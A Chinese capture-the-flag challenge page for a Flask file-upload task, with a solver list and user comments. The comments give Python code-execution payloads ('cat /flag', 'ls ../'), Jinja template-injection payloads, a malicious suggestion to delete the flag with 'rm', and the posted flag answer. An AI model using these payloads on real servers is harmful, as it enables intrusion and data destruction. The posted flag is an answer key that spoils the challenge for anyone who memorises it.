Flask_FileUploadWEB 未解决
分数:
10
金币:
3
题目作者:
valecalida
一 血:
Lazzaro
一血奖励:
3金币
解 决:
12649
提 示:
描 述:
Flask_FileUpload
评分(20)
解题动态
cha8e1 攻破了该题 3小时前
yehlg 攻破了该题 1天前
yu'c 攻破了该题 1天前
avaclaire 攻破了该题 1天前
Kernel1 攻破了该题 1天前
脚本gay 攻破了该题 2天前
YS_JW 攻破了该题 2天前
池屿 攻破了该题 3天前
wujita01 攻破了该题 3天前
hsk_zy 攻破了该题 4天前
zhuguangsen 攻破了该题 4天前
Hackerchen 攻破了该题 4天前
mmhhdm 攻破了该题 4天前
yangyy 攻破了该题 4天前
simple9527 攻破了该题 4天前
bugfuck2 攻破了该题 4天前
Motona_Sky 攻破了该题 6天前
kitniu 攻破了该题 8天前
nanaqilin 攻破了该题 11天前
评论
loulegedadong 1年前
举报
意思是会将我们上传的文件用python去执行,并回显执行结果 那么我们就得在上传的文件里面写python代码,从而读取flag 随便传一个jpg图片,抓包,在文件内容中写python代码
user0505 1年前
举报
为什么访问不出网站啊?
yqwapc001 1年前
举报
强
821170924 1年前
举报
在.txt文本输入下面两行代码(注意换行),文件名改为flie 后缀.jpg接着F12查看源码直接有了。 import os //换行四个斜杠不要//os.system('cat /flag')
jackflank 1年前
举报
@Masterk 使用命令查看 上一级目录文件以及文件夹分布 os.system('ls ../')
heichao666 1年前
举报
@Masterk 试着试着就出来了
Masterk 1年前
举报
你怎么知道代码是写 cat /flag?
X9527C 1年前
举报
...
群众里有坏人 1年前
举报
建一个文本文档输import os os.system('rm - f /flag') 修改后缀名为.jpg或.png
Despa1r 1年前
举报
还是好人多
nickeyes 1年前
举报
这个需要上传一个可以查看flag的文件,文件后缀需要是jpg,上传成功后直接查看源代码,flag就直接显示了
taozhi 1年前
举报
提个醒.jpg也不可以哦,必须带个前缀
htttpss 1年前
举报
flag{3a9063cc6eada635c4f7586aab1da640}
timtoc 1年前
举报
{{config.__init__.__globals__['__builtins__']['__import__']('os').popen('cat /flag').read()}};{{config.__init__.__globals__['os'].popen('cat ../flag').read()}} 有人给了这两种解法,有大侠解释下吗?我直接url+{{...}}访问显示404